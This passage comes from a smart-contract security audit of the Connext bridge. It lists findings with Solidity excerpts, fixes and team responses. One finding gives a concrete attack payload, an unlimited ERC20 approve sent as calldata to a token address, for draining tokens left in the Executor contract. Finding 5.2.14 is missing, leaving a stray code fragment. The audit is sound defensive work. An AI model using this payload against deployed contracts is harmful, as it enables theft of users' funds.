        (bool success, bytes memory returnData) = s.executor.execute(...); // no native tokens sent
    }
}

contract Executor is IExecutor {
    function execute(ExecutorArgs memory _args) external payable override onlyConnext returns (bool, bytes memory) {
        ...
        if (isNative && msg.value != _args.amount) { // msg.value is always 0
            ...
        }
    }
}
Recommendation: Change the code of execute() to handle previously sent native assets, or send the native assets along with the call to execute().
Connext: Solved in PR 1532.
Spearbit: Verified.
Connext: Alternate approach: removed native asset handling. Implemented in PR 31.
Spearbit: Verified.
+5.2.9 Add checks to xcall()
Severity: High Risk
Context: BridgeFacet.sol#L240-L339, BridgeFacet.sol#L400-L419, Executor.sol#L142-L280
Description: The function xcall() does some sanity checks; nevertheless, more checks should be added to prevent issues later on in the use of the protocol. If _args.recovery == 0, then _sendToRecovery() will send funds to the zero address, effectively losing them. If _params.agent == 0, forceReceiveLocal can't be used and funds might be locked forever. _args.params.destinationDomain should never be s.domain, although this is also implicitly checked via _mustHaveRemote(), assuming a correct configuration. If _args.params.slippageTol is set to something greater than s.LIQUIDITY_FEE_DENOMINATOR, then funds can be locked, as xcall() allows the user to provide the local asset, avoiding any swap, while _handleExecuteLiquidity() in execute() may attempt to perform a swap on the destination chain.
function xcall(XCallArgs calldata _args) external payable nonReentrant whenNotPaused returns (bytes32) {
    // Sanity checks.
    ...
}
Recommendation: Consider adding the following checks:
• recovery != 0.
• agent != 0.
• _args.params.destinationDomain != s.domain.
• _args.params.slippageTol <= s.LIQUIDITY_FEE_DENOMINATOR.
Also double-check whether any additional checks are useful.
Connext: Solved in PR 1536.
Spearbit: Verified.
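The four listed checks, expressed as guards at the top of xcall(); this is a sketch only, and the custom error names are illustrative, not Connext's actual errors:
// Sketch only: fail fast before any funds are debited.
if (_args.params.recovery == address(0)) revert BridgeFacet__xcall_missingRecovery();
if (_args.params.agent == address(0)) revert BridgeFacet__xcall_missingAgent();
if (_args.params.destinationDomain == s.domain) revert BridgeFacet__xcall_destinationIsLocal();
if (_args.params.slippageTol > s.LIQUIDITY_FEE_DENOMINATOR) revert BridgeFacet__xcall_invalidSlippageTol();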
+5.2.10 Executor and AssetLogic deal with native tokens inconsistently, which breaks execute()
Severity: High Risk
Context: Executor.sol#L142, AssetLogic.sol#L127-L151, BridgeFacet.sol#L644-L718
Description: When dealing with an external callee, the BridgeFacet transfers liquidity to the Executor before calling Executor.execute. In order to send the native token:
• The Executor checks for _args.assetId == address(0).
• AssetLogic.transferAssetFromContract() disallows address(0).
Note: also see issue "Executor reverts on receiving native tokens from BridgeFacet".
contract BridgeFacet is BaseConnextFacet {
    function _handleExecuteTransaction() ... {
        ...
        AssetLogic.transferAssetFromContract(_asset, address(s.executor), _amount); // _asset may not be 0
        (bool success, bytes memory returnData) = s.executor.execute(
            IExecutor.ExecutorArgs(
                // assetId parameter from ExecutorArgs
                // must be 0 for native asset
                ...
                _asset,
                ...
            )
        );
        ...
    }
}

library AssetLogic {
    function transferAssetFromContract(address _assetId, ...) {
        ...
        // No native assets should ever be stored on this contract
        if (_assetId == address(0)) revert AssetLogic__transferAssetFromContract_notNative();
        if (_assetId == address(s.wrapper)) {
            // If dealing with wrapped assets, make sure they are properly unwrapped
            // before sending from contract
            s.wrapper.withdraw(_amount);
            Address.sendValue(payable(_to), _amount);
        }
    }
}

contract Executor is IExecutor {
    function execute(ExecutorArgs memory _args) external payable override onlyConnext returns (bool, bytes memory) {
        ...
        bool isNative = _args.assetId == address(0);
        ...
    }
}
As a result, the BridgeFacet cannot handle external callees when using native tokens.
Recommendation: Native tokens are represented as either address(0) or address(wrapper) throughout the code base, and this inconsistency is error prone. We recommend that the team go through the whole code base and make sure the representation is used consistently.
Connext: Solved in PR 1532.
Spearbit: Verified.
Connext: Alternate approach: removed native asset handling. Implemented in PR 1641.
Spearbit: Verified.
+5.2.11 Executor reverts on receiving native tokens from BridgeFacet
Severity: High Risk
Context: Executor.sol, BridgeFacet.sol#L696, AssetLogic.sol#L127-L151
Description: When doing an external call in execute(), the BridgeFacet provides liquidity to the Executor contract before calling Executor.execute. The BridgeFacet transfers the native token when address(wrapper) is provided. The Executor, however, does not have a fallback/receive function. Hence, the transaction reverts when the BridgeFacet tries to send the native token to the Executor contract.
function _handleExecuteTransaction(
    ...
    AssetLogic.transferAssetFromContract(_asset, address(s.executor), _amount);
    (bool success, bytes memory returnData) = s.executor.execute(...);
    ...
}

function transferAssetFromContract(...) ... {
    ...
    if (_assetId == address(s.wrapper)) {
        // If dealing with wrapped assets, make sure they are properly unwrapped
        // before sending from contract
        s.wrapper.withdraw(_amount);
        Address.sendValue(payable(_to), _amount);
    } else {
        ...
    }
}
Recommendation: We recommend adding a receive function to the Executor contract:
receive() external payable {
    require(msg.sender == connext);
}
Or unwrap the native asset and send it along with the call to the executor.
Connext: Ether sent along with the call. Solved in PR 1532.
Spearbit: Verified.
Connext: Alternate approach: removed native asset handling. Implemented in PR 31.
Spearbit: Verified.
+5.2.12 SponsorVault sponsors full transfer amount in reimburseLiquidityFees()
Severity: High Risk
Context: BridgeFacet.sol#L660-L663
Description: The BridgeFacet passes args.amount as _liquidityFee when calling reimburseLiquidityFees. Instead of sponsoring the liquidity fee, the sponsor vault would sponsor the full transfer amount to the receiver.
Note: Luckily the amount in reimburseLiquidityFees is capped by relayerFeeCap.
function _handleExecuteTransaction(...) ... {
    ...
    (bool success, bytes memory data) = address(s.sponsorVault).call(
        abi.encodeWithSelector(s.sponsorVault.reimburseLiquidityFees.selector, _asset, _args.amount, _args.params.to)
    );
}
Recommendation: Pass args.amount * (s.LIQUIDITY_FEE_DENOMINATOR - s.LIQUIDITY_FEE_NUMERATOR) / s.LIQUIDITY_FEE_DENOMINATOR instead.
Connext: Solved in PR 1551.
Spearbit: Verified.
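A short worked example of the recommended formula (the numerator/denominator values are assumed for illustration): with LIQUIDITY_FEE_NUMERATOR = 9995 and LIQUIDITY_FEE_DENOMINATOR = 10000 (a 0.05% liquidity fee), a transfer of 1,000 tokens should reimburse 1000 * (10000 - 9995) / 10000 = 0.5 tokens, rather than the full 1,000 tokens that the unfixed code would request.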
+5.2.13 Tokens can get stuck in Executor contract if the destination doesn’t claim them all
Severity: High Risk
Context: Executor.sol#L142-L243
Description: The function execute() increases the allowance and then calls the recipient (_args.to). When the recipient does not use all tokens, these can remain stuck inside the Executor contract.
Note: the executor can have excess tokens, see: kovan executor.
Note: see issue "Malicious call data can DOS execute or steal unclaimed tokens in the Executor contract".
function execute(...) ... {
    ...
    if (!isNative && hasValue) {
        SafeERC20.safeIncreaseAllowance(IERC20(_args.assetId), _args.to, _args.amount);
    }
    ...
    (success, returnData) = ExcessivelySafeCall.excessivelySafeCall(
        _args.to,
        ...
    );
    ...
}
Recommendation: Determine what should happen with unclaimed tokens. Consider one or more of the following suggestions (see the sketch after this list):
• Send the unclaimed tokens to the recovery address via _sendToRecovery() (although this further complicates the contract).
• Set the allowance to 0 (before safeIncreaseAllowance() or after the call to excessivelySafeCall()).
• Allow the retrieval of unclaimed tokens from the executor contract by an owner.
Connext: New policy: "any funds left in the Executor following a transfer are claimable by anyone". This forces implementers to think carefully about the calldata. Thus we leave the issue as is.
Spearbit: Acknowledged. Note: as it requires some deliberate action to retrieve the tokens, in practice several tokens will stay behind in the executor.
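A minimal sketch of the second suggestion, clawing back any unspent allowance after the external call (variable names follow the snippet above; this is illustrative, not the adopted fix, since the team chose the claimable-by-anyone policy instead):
// Sketch only: after the call, remove whatever allowance the callee left unused.
(success, returnData) = ExcessivelySafeCall.excessivelySafeCall(_args.to, gas, 0, MAX_COPY, _args.callData);
if (IERC20(_args.assetId).allowance(address(this), _args.to) != 0) {
    SafeERC20.safeApprove(IERC20(_args.assetId), _args.to, 0);
}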
   * @param token The token to receive
   * @param recipient The recipient of the token
   * @return The amount of tokens resulting from the swap
   */
  function swapExactIn(address token, address recipient) external payable returns (uint256);
}

Recommendation: Double-check the code to see what the intended behavior is. Connext: Solved in PR 1551. Spearbit: Verified.

+5.2.15 Anyone can repay the portalDebt with different tokens Severity: High Risk Context: PortalFacet.sol#L80-L113, PortalFacet.sol#L115-L167 Description: Routers can provide liquidity in the protocol to improve the UX of cross-chain transfers. Liquidity is sent to users with the router's consent before the cross-chain message is settled on the optimistic message protocol, i.e., Nomad. The router can also borrow liquidity from AAVE if the router does not have enough of it. It is the router's responsibility to repay the debt to AAVE.

contract PortalFacet is BaseConnextFacet {
  function repayAavePortalFor(
    address _adopted,
    uint256 _backingAmount,
    uint256 _feeAmount,
    bytes32 _transferId
  ) external payable {
    address adopted = _adopted == address(0) ? address(s.wrapper) : _adopted;
    ...
    // Transfer funds to the contract
    uint256 total = _backingAmount + _feeAmount;
    if (total == 0) revert PortalFacet__repayAavePortalFor_zeroAmount();
    (, uint256 amount) = AssetLogic.handleIncomingAsset(_adopted, total, 0);
    ...
    // repay the loan
    _backLoan(adopted, _backingAmount, _feeAmount, _transferId);
  }
}

The PortalFacet does not check whether _adopted is the correct token for the debt. Assume the protocol borrows ETH for the current _transferId; the router should therefore repay ETH to clear the debt. However, the router can provide any valid token, e.g. DAI or USDC, to clear the debt. This results in the insolvency of the protocol. Note: a similar issue is also present in repayAavePortal(). Recommendation: Check that _adopted is the correct token for this transfer. Connext: Solved in PR 1559. Spearbit: Verified.

+5.2.16 Malicious call data can steal unclaimed tokens in the Executor contract Severity: High Risk Context: Executor.sol#L211 Description: Users can provide a destination contract args.to and arbitrary data _args.callData when doing a cross-chain transfer. The protocol provides an allowance to the callee contract and triggers the function call through ExcessivelySafeCall.excessivelySafeCall.

contract Executor is IExecutor {
  function execute(ExecutorArgs memory _args) external payable override onlyConnext returns (bool, bytes memory) {
    ...
    SafeERC20.safeIncreaseAllowance(IERC20(_args.assetId), _args.to, _args.amount);
    ...
    // Try to execute the callData
    // the low level call will return `false` if its execution reverts
    (success, returnData) = ExcessivelySafeCall.excessivelySafeCall(
      _args.to,
      gas,
      isNative ? _args.amount : 0,
      MAX_COPY,
      _args.callData
    );
    ...
  }
}

Since there are no restrictions on the destination contract and calldata, exploiters can steal tokens from the executor. Note: the executor does have excess tokens, see: kovan executor. Note: see issue "Tokens can get stuck in Executor contract". Tokens can be stolen by granting an allowance: setting calldata = abi.encodeWithSelector(ERC20.approve.selector, exploiter, type(uint256).max); and args.to = tokenAddress allows the exploiter to get an infinite allowance of any token, effectively stealing any unclaimed tokens left in the executor. Recommendation: The protocol could communicate with the callee contract through a callback function.
A possible specification of the callback:

function connextExecute(uint32 origin, address adoptedToken, address originSender, uint256 amount, bytes calldata callData) returns (bytes4)

This results in higher gas efficiency, because callees do not have to query origin, originSender, and amount through three separate external calls. Note: this way arbitrary calls are not possible anymore. Connext: New policy: "any funds left in the Executor following a transfer are claimable by anyone". This forces implementers to think carefully about the calldata. Thus leave the issue as is. Spearbit: Acknowledged.

5.3 Medium Risk

+5.3.1 Fee-On-Transfer tokens are not explicitly denied in swap() Severity: Medium Risk Context: SwapUtils.sol#L690-L729 Description: The swap() function is used extensively within the Connext protocol, primarily when swapping between local and adopted assets. When a swap is performed, the function checks the actual amount transferred. However, this is not consistent with other swap functions, which check that the amount transferred is equal to dx. As a result, overwriting dx with tokenFrom.balanceOf(address(this)).sub(beforeBalance) allows fee-on-transfer tokens to work as intended. Recommendation: Consider adding a require(dx == tokenFrom.balanceOf(address(this)).sub(beforeBalance), "not support fee token"); check prior to overwriting dx to ensure fee-on-transfer tokens are not used in the swap. Connext: Solved in PR 1642, in this commit. Spearbit: Verified.

+5.3.2 xcall() may erroneously overwrite prior calls to bumpTransfer() Severity: Medium Risk Context: BridgeFacet.sol#L380-L386, BridgeFacet.sol#L313 Description: The bumpTransfer() function allows users to increment the relayer fee on any given transferId without checking if the unique transfer identifier exists. As a result, a subsequent call to xcall() will overwrite the s.relayerFees mapping, leading to lost funds. Recommendation: Consider adding a check in bumpTransfer() to ensure _transferId exists. This mitigation can be implemented in a similar fashion to PromiseRouter.bumpCallbackFee(). It is important to note that checking for a non-zero s.relayerFees is not sufficient, as xcall() accepts zero values. Alternatively, it may be more succinct to modify xcall() such that s.relayerFees is incremented instead of overridden. Connext: Solved in PR 1643. Spearbit: Verified. Note: a remaining risk is that bumpTransfer() allows adding funds to an invalid transferId. This is comparable to transferring tokens to the wrong address.

+5.3.3 _handleExecuteLiquidity doesn't consistently check for receiveLocalOverrides Severity: Medium Risk Context: BridgeFacet.sol#L571-L638 Description: The function _handleExecuteLiquidity() initially checks for receiveLocal but does not check for receiveLocalOverrides. Later on it does check for both values.

function _handleExecuteLiquidity(...) ... {
  ...
  if (
    !_args.params.receiveLocal && // doesn't check for receiveLocalOverrides
    s.routerBalances[_args.routers[0]][_args.local] < toSwap &&
    s.aavePool != address(0)
  ) {
    ...
    if (_args.params.receiveLocal || s.receiveLocalOverrides[_transferId]) { // extra check
      return (toSwap, _args.local);
    }
  }

As a result, the portal may pay the bridge user in the adopted asset when they opted to override this behaviour to avoid slippage conditions outside of their boundaries, potentially leading to an unwarranted reception of funds denominated in the adopted asset.
Recommendation: Consider adding a check for receiveLocalOverrides to the Aave portal eligibility check. Connext: Solved in PR 1644. Spearbit: Verified.

+5.3.4 Router signatures can be replayed when executing messages on the destination domain Severity: Medium Risk Context: BridgeFacet.sol#L476-496 Description: The Connext bridge supports near-instant transfers by allowing users to pay a small fee to routers for providing them with liquidity. Gelato relayers are tasked with taking in bids from liquidity providers, who sign a message consisting of the transferId and path length. The path length variable only guarantees that the message they signed will only be valid if _args.routers.length - 1 routers are also selected. However, it does not prevent Gelato relayers from re-using the same signature multiple times. As a result, routers may unintentionally provide more liquidity than expected. Recommendation: Consider ensuring that a router's signed message can only be used once for a given transferId. It may be useful to track these in a boolean mapping. Connext: Solved in PR 1626. Spearbit: Verified. Note: this still assumes that the sequencer is a centralized role maintained by the Connext team. We understand that this will be addressed in future on-chain changes to incentivize honest behavior and further decentralize the sequencer role. Connext: Currently the sequencer is a centralized role, and will be decentralized in the future. Consider that the only 'attack vector' here (really more of a griefing vector) is that the sequencer has only the potential to favor certain routers over others, and cannot steal anyone's funds. Additionally, we know that the 'randomness' of the sequencer selection - while not strictly enforceable on-chain - will at the very least be demonstrated publicly; anyone can check to see that our sequencer has been behaving politely (simply check the distribution of router usage over time, it should be relatively even). So it should be okay to continue this in a centralized manner for the time being, since funds are not jeopardized, and the only trust vector here is that we continue to select routers fairly to make sure everyone gets a fair share of profits. For clarity's sake: the model towards decentralization will probably involve 'fair selection' being enforceable through staking/slashing in the future.

+5.3.5 diamondCut() allows re-execution of old updates Severity: Medium Risk Context: LibDiamond.sol#L95-L119 Description: The function diamondCut() of LibDiamond verifies the signed version of the update parameters. It checks that the signed version is available and a sufficient amount of time has passed. However, it doesn't prevent multiple executions, and the signed version stays valid forever. This allows old updates to be executed again. Assume the following: • facet_x (or function_y) has value: version_1. • Then: replace facet_x (or function_y) with version_2. • Then a bug is found in version_2 and it is rolled back with: replace facet_x (or function_y) with version_1. • Then a (malicious) owner could immediately do: replace facet_x (or function_y) with version_2 (because it is still valid). Note: the risk is limited because it can only be executed by the contract owner; however, this is probably not how the mechanism should work.

library LibDiamond {
  function diamondCut(...) ... {
    ...
    uint256 time = ds.acceptanceTimes[keccak256(abi.encode(_diamondCut, _init, _calldata))];
    require(time != 0 && time < block.timestamp, "LibDiamond: delay not elapsed");
    ...
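    // Editor's sketch (an assumption, not the team's actual fix): consuming the
    // acceptance slot here would prevent the same signed update from being
    // replayed later, e.g.
    // delete ds.acceptanceTimes[keccak256(abi.encode(_diamondCut, _init, _calldata))];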
  }
}

Recommendation: Consider doing the following: • Add a validity period for updates; • Remember which updates have been executed and prevent re-execution; • Add a nonce (for cases where a re-execution is wanted). Connext: Solved in PR 1576. Spearbit: Verified.

+5.3.6 Not always safeApprove(..., 0) Severity: Medium Risk Context: AssetLogic.sol#L263-L295, Executor.sol#L142-L339, NomadFacet.sol#L176-L242, AssetLogic.sol#L308-L362, PortalFacet.sol#L179-L197 Description: Some functions, like _reconcileProcessPortal of NomadFacet and _swapAssetOut of AssetLogic, do safeApprove(..., 0) first.

contract NomadFacet is BaseConnextFacet {
  function _reconcileProcessPortal(...) ... {
    ...
    // Edge case with some tokens: Example USDT in ETH Mainnet, after the backUnbacked call there could be a remaining allowance if not the whole amount is pulled by aave.
    // Later, if we try to increase the allowance it will fail. USDT demands if allowance is not 0, it has to be set to 0 first.
    // Example: [ParaSwapRepayAdapter.sol#L138-L140](https://github.com/aave/aave-v3-periphery/blob/ca184e5278bcbc10d28c3dbbc604041d7cfac50b/contracts/adapters/paraswap/ParaSwapRepayAdapter.sol#L138-L140)
    SafeERC20.safeApprove(IERC20(adopted), s.aavePool, 0);
    SafeERC20.safeIncreaseAllowance(IERC20(adopted), s.aavePool, totalRepayAmount);
    ...
  }
}

While the following functions don't do this: • xcall of BridgeFacet. • _backLoan of PortalFacet. • _swapAsset of AssetLogic. • execute of Executor. This could result in problems with tokens like USDT.

contract BridgeFacet is BaseConnextFacet {
  function xcall(XCallArgs calldata _args) external payable nonReentrant whenNotPaused returns (bytes32) {
    ...
    SafeERC20.safeIncreaseAllowance(IERC20(bridged), address(s.bridgeRouter), bridgedAmt);
    ...
  }
}

contract PortalFacet is BaseConnextFacet {
  function _backLoan(...) ... {
    ...
    SafeERC20Upgradeable.safeIncreaseAllowance(IERC20Upgradeable(_asset), s.aavePool, _backing + _fee);
    ...
  }
}

library AssetLogic {
  function _swapAsset(...) ... {
    ...
    SafeERC20.safeIncreaseAllowance(IERC20(_assetIn), address(pool), _amount);
    ...
  }
}

contract Executor is IExecutor {
  function execute(...) ... {
    ...
    SafeERC20.safeIncreaseAllowance(IERC20(_args.assetId), _args.to, _args.amount);
    ...
  }
}

Recommendation: Consider adding safeApprove(..., 0). Connext: Solved in PR 1550. Spearbit: Verified.

+5.3.7 _slippageTol does not adjust for decimal differences Severity: Medium Risk Context: AssetLogic.sol#L273 Description: Users set the slippage tolerance as a percentage. AssetLogic calculates minReceived = (_amount * _slippageTol) / s.LIQUIDITY_FEE_DENOMINATOR and then uses minReceived in the swap functions. minReceived, however, does not adjust for the decimal differences between assetIn and assetOut. Users will either always hit the slippage limit or suffer huge slippage when assetIn and assetOut have a different number of decimals. Assume the number of decimals of assetIn is 6 and the number of decimals of assetOut is 18: minReceived will be set 10^12 times smaller than the correct value, and users would be vulnerable to sandwich attacks. Assume the number of decimals of assetIn is 18 and the number of decimals of assetOut is 6: minReceived will be set 10^12 times larger than the correct value, so users would always hit the slippage limit and the cross-chain transfer would get stuck.

library AssetLogic {
  function _swapAsset(...) ...
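  // Editor's note: minReceived computed just below is denominated in assetIn's
  // decimals; per the recommendation it should be rescaled (with
  // swapStorage.tokenPrecisionMultipliers for the internal swap, token.decimals
  // for the external one) before being compared against assetOut amounts.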
  {
    // Swap the asset to the proper local asset
    uint256 minReceived = (_amount * _slippageTol) / s.LIQUIDITY_FEE_DENOMINATOR;
    ...
    return (pool.swapExact(_amount, _assetIn, _assetOut, minReceived), _assetOut);
    ...
  }
}

Recommendation: Recommend adjusting the value with swapStorage.tokenPrecisionMultipliers for the internal swap. For the external swap, the value should be adjusted according to token.decimals. Connext: Solved in PR 1574. Spearbit: Verified.

+5.3.8 Canonical assets should be keyed on the hash of domain and id Severity: Medium Risk Context: LibConnextStorage.sol#L184, AssetLogic.sol#L36, AssetFacet.sol#L143, TokenRegistry.sol#L112-L113, TokenRegistry.sol#L334 Description: A canonical asset is a tuple of a (domain, id) pair. TokenRegistry's owner has the power to register new tokens in the system (see TokenRegistry.ensureLocalToken() and TokenRegistry.enrollCustom()). A canonical asset is registered using the hash of its domain and id (see TokenRegistry._setCanonicalToRepresentation()). Connext uses only the id of a canonical asset to uniquely identify it. Here are a few references: • swapStorages • canonicalToAdopted It is an issue if TokenRegistry registers two canonical assets with the same id. If this id fetches the incorrect canonical asset, an unintended one might be transferred to the destination chain, or the transfers may revert. Recommendation: Consider using the keccak256 hash of the canonical asset's domain and id for mapping keys. Connext: Solved in PR 1588. Spearbit: Verified.

+5.3.9 Missing checks for Chainlink oracle Severity: Medium Risk Context: ConnextPriceOracle.sol#L98, ConnextPriceOracle.sol#L153 Description: The ConnextPriceOracle.getTokenPrice() function goes through a series of oracles. At each step, it has a few validations to avoid an incorrect price. If such validations succeed, the function returns the non-zero oracle price. For the Chainlink oracle, getTokenPrice() ultimately calls getPriceFromChainlink(), which has the following validation:

if (answer == 0 || answeredInRound < roundId || updateAt == 0) {
  // answeredInRound > roundId ===> ChainLink Error: Stale price
  // updatedAt = 0 ===> ChainLink Error: Round not complete
  return 0;
}

updateAt refers to the timestamp of the round. This value isn't checked to make sure it is recent. Additionally, it is important to be aware of the minAnswer and maxAnswer of the Chainlink oracle; these values are not allowed to be reached or surpassed. See the Chainlink API reference for documentation on minAnswer and maxAnswer, as well as this piece of code: OffchainAggregator.sol Recommendation: • Determine the tolerance threshold for updateAt. If block.timestamp - updateAt exceeds that threshold, return 0, which is consistent with how the current validations are handled. • Consider having off-chain monitoring to identify when the market price moves out of the [minAnswer, maxAnswer] range. Connext: Recency check is implemented in PR 1602. Off-chain monitoring will be considered. Spearbit: Verified and acknowledged.

+5.3.10 Same params.SlippageTol is used in two different swaps Severity: Medium Risk Context: BridgeFacet.sol#L299-L304, BridgeFacet.sol#L637 Description: The Connext protocol does a cross-chain transfer with the help of the Nomad protocol. In order to use the Nomad protocol, Connext has to convert the adopted token into the local token. For a cross-chain transfer, users take up two swaps: Adopted -> Local on the source chain and Local -> Adopted on the destination chain.
BridgeFacet.sol#L299-L304

function xcall(XCallArgs calldata _args) external payable whenNotPaused nonReentrant returns (bytes32) {
  ...
  // Swap to the local asset from adopted if applicable.
  (uint256 bridgedAmt, address bridged) = AssetLogic.swapToLocalAssetIfNeeded(
    canonical,
    transactingAssetId,
    amount,
    _args.params.slippageTol
  );
  ...
}

BridgeFacet.sol#L637

function _handleExecuteLiquidity(
  bytes32 _transferId,
  bytes32 _canonicalId,
  bool _isFast,
  ExecuteArgs calldata _args
) private returns (uint256, address) {
  ...
  // swap out of mad* asset into adopted asset if needed
  return AssetLogic.swapFromLocalAssetIfNeeded(_canonicalId, _args.local, toSwap, _args.params.slippageTol);
}

The same slippage tolerance _args.params.slippageTol is used in both swaps. In most cases users cannot set a slippage tolerance that correctly protects both swaps. Assume the Nomad asset is slightly cheaper on both chains and 1 Nomad asset equals 1.01 adopted assets. An expected swap would be: 1 adopted -> 1.01 Nomad asset -> 1 adopted. The right slippage tolerance should be set at 1.01 and 0.98, respectively; users cannot set the correct tolerance with a single parameter. This makes users vulnerable to MEV searchers. Also, user transfers can get stuck during periods of instability. Recommendation: Allow users to set two different slippage tolerances for the two swaps. Connext: Solved in PR 1575. Spearbit: Verified.

5.4 Low Risk

+5.4.1 getTokenPrice() returns stale token prices Severity: Low Risk Context: ConnextPriceOracle.sol#L88-L107 Description: getTokenPrice() reads from the assetPrices[tokenAddress].price mapping, which stores the latest price as configured by the protocol admin in setDirectPrice(). However, the check for a stale token price will never fall back to other price oracles, as tokenPrice != 0. Therefore, the stale token price will be unintentionally returned. Recommendation: If assetPrices[tokenAddress].updatedAt is considered stale, consider setting tokenPrice to zero such that the function attempts to query the fallback oracles. Connext: Solved in PR 1647. Spearbit: Verified.

+5.4.2 Potential division by zero if gas token oracle is faulty Severity: Low Risk Context: SponsorVault.sol#L250-L252 Description: In the event that the gas token oracle is faulty and returns malformed values, the call to reimburseRelayerFees() in _handleExecuteTransaction() will fail. Fortunately, the low-level call() function will not prevent the transfer from being executed; however, this may lead to further issues down the line if changes are made to the sponsor vault. Recommendation: Consider checking that den != 0 before calculating sponsoredFee. Connext: Solved in PR 1645. Spearbit: Verified.

+5.4.3 Burn does not lower allowance Severity: Low Risk Context: BridgeRouter.sol#L252-L280, BridgeToken.sol#L62-L64 Description: The function _takeTokens() of BridgeRouter takes in the tokens from the sender. Sometimes it transfers them and sometimes it burns them. In the case of burning the tokens, the allowance isn't "used up".

function _takeTokens(...) ... {
  ...
  if (tokenRegistry.isLocalOrigin(_token)) {
    ...
    IERC20(_token).safeTransferFrom(msg.sender, address(this), _amount);
    ...
  } else {
    ...
    _t.burn(msg.sender, _amount);
    ...
  }
  ... // doesn't use up the allowance
}

contract BridgeToken is Version0, IBridgeToken, OwnableUpgradeable, ERC20 {
  ...
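  // Editor's note (sketch of the recommendation that follows, assuming OpenZeppelin
  // semantics): ERC20Burnable.burnFrom(account, amount) spends the caller's
  // allowance before burning, whereas the bare _burn below leaves it intact.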
  function burn(address _from, uint256 _amnt) external override onlyOwner {
    _burn(_from, _amnt);
  }
}

Recommendation: Consider using a function like OZ's burnFrom(), which does use up the allowance. Connext: The BridgeRouter basically has unlimited allowance for BridgeTokens, by design. The user doesn't allow the Bridge to burn tokens, and so there is no allowance to reduce. Spearbit: Acknowledged.

+5.4.4 Two step ownership transfer Severity: Low Risk Context: ConnextPriceOracle.sol#L221-L226, BridgeRouter.sol#L479-L486 Description: The function setAdmin() transfers ownership to a new address. In case a wrong address is supplied, ownership becomes inaccessible. The same issue occurs with transferOwnership of OwnableUpgradeable in several Nomad contracts. Additionally, the Nomad contracts try to prevent renounceOwnership; however, the same effect can be accomplished with a transferOwnership to a nonexistent address. Relevant Nomad contracts: • TokenRegistry.sol • NomadBase.sol • UpdaterManager.sol • XAppConnectionManager.sol

contract ConnextPriceOracle is PriceOracle {
  ...
  function setAdmin(address newAdmin) external onlyAdmin {
    address oldAdmin = admin;
    admin = newAdmin;
    emit NewAdmin(oldAdmin, newAdmin);
  }
}

contract BridgeRouter is Version0, Router {
  ...
  /**
   * @dev should be impossible to renounce ownership;
   * we override OpenZeppelin OwnableUpgradeable's implementation
   * of renounceOwnership to make it a no-op
   */
  function renounceOwnership() public override onlyOwner {
    // do nothing
  }
}

Recommendation: Consider implementing a two-step ownership transfer. Connext: Will not change for BridgeRouter. Solved for the PriceOracle in PR 1605. Spearbit: Acknowledged and verified.

+5.4.5 Function removeRouter does not clear approvedForPortalRouters Severity: Low Risk Context: RoutersFacet.sol#L293-L325, LibConnextStorage.sol#L104-L111 Description: The function removeRouter() clears most of the fields of the struct RouterPermissionsManagerInfo, except for approvedForPortalRouters. It is still good to also remove approvedForPortalRouters in removeRouter(), because if the router were to be added again later (via setupRouter()), or _isRouterOwnershipRenounced is set in the future, the router would still have the old approvedForPortalRouters.

struct RouterPermissionsManagerInfo {
  mapping(address => bool) approvedRouters; // deleted
  mapping(address => bool) approvedForPortalRouters; // not deleted
  mapping(address => address) routerRecipients; // deleted
  mapping(address => address) routerOwners; // deleted
  mapping(address => address) proposedRouterOwners; // deleted
  mapping(address => uint256) proposedRouterTimestamp; // deleted
}

contract RoutersFacet is BaseConnextFacet {
  function removeRouter(address router) external onlyOwner {
    ...
    s.routerPermissionInfo.approvedRouters[router] = false;
    ...
    s.routerPermissionInfo.routerOwners[router] = address(0);
    ...
    s.routerPermissionInfo.routerRecipients[router] = address(0);
    ...
    delete s.routerPermissionInfo.proposedRouterOwners[router];
    delete s.routerPermissionInfo.proposedRouterTimestamp[router];
  }
}

Recommendation: In the function removeRouter, also clear approvedForPortalRouters. Connext: Solved in PR 1586. Spearbit: Verified.

+5.4.6 Anyone can self burn lp token of the AMM Severity: Low Risk Context: LPToken.sol Description: When providing liquidity into the AMM pool, users get LP tokens. Users can redeem their share of the liquidity by redeeming LP tokens to the AMM pool. The current LPToken contract inherits OpenZeppelin's ERC20BurnableUpgradeable.
Users can burn their tokens by calling burn without notifying the AMM pools (ERC20BurnableUpgradeable.sol#L26-L28). Although users do not profit from this action, it brings up concerns such as: • An exploiter has an easy way to pump the LP price. Burning LP is similar to donating value to the pool. While it's good for the pool, this gives the exploiter another tool to break other protocols. After the Cream Finance attack, many protocols started taking extra caution and made this (absorbing donations) a restricted function: github.com/yearn/yearn-security/blob/master/disclosures/2021-10-27.md. • It goes against best practice. Every state of an AMM is related to price. Allowing external actors to change the AMM state without notifying the main contract is dangerous. It also makes it harder for a developer to build other novel AMMs based on the same architecture. Note: the burn function is also not protected by nonReentrant or whenNotPaused. Recommendation: Add an onlyOwner modifier. Only the AMM pool should be able to burn LP tokens. Connext: Solved in PR 1606. Spearbit: Verified.

+5.4.7 Skip timeout in diamondCut() (edge case) Severity: Low Risk Context: LibDiamond.sol#L95-L119 Description: Edge case: if someone manages to get an update through which deletes all facets, then the next update skips the delay (because ds.facetAddresses.length will be 0).

library LibDiamond {
  function diamondCut(...) ... {
    ...
    if (ds.facetAddresses.length != 0) {
      uint256 time = ds.acceptanceTimes[keccak256(abi.encode(_diamondCut, _init, _calldata))];
      require(time != 0 && time < block.timestamp, "LibDiamond: delay not elapsed");
    }
    // Otherwise, this is the first instance of deployment and it can be set automatically
    ...
  }
}

Recommendation: Make it so the skipping of the timeout can only be done once, for example by setting a flag. Connext: Solved in PR 1607. Spearbit: Verified.

+5.4.8 Limit gas for s.executor.execute() Severity: Low Risk Context: BridgeFacet.sol#L644-L718 Description: The call to s.executor.execute() in BridgeFacet might use up all available gas. In that case, the callback to report to the originator might not be called, because the execution stops due to an out-of-gas error. Note: the execute() function might be retried by the relayer, so perhaps this will fix itself eventually. Note: excessivelySafeCall in Executor does limit the amount of gas.

contract BridgeFacet is BaseConnextFacet {
  function _handleExecuteTransaction(...) ... {
    ...
    (bool success, bytes memory returnData) = s.executor.execute(...); // might use all available gas
    ...
    // If callback address is not zero, send on the PromiseRouter
    if (_args.params.callback != address(0)) {
      s.promiseRouter.send(...); // might not have enough gas
    }
    ...
  }
}

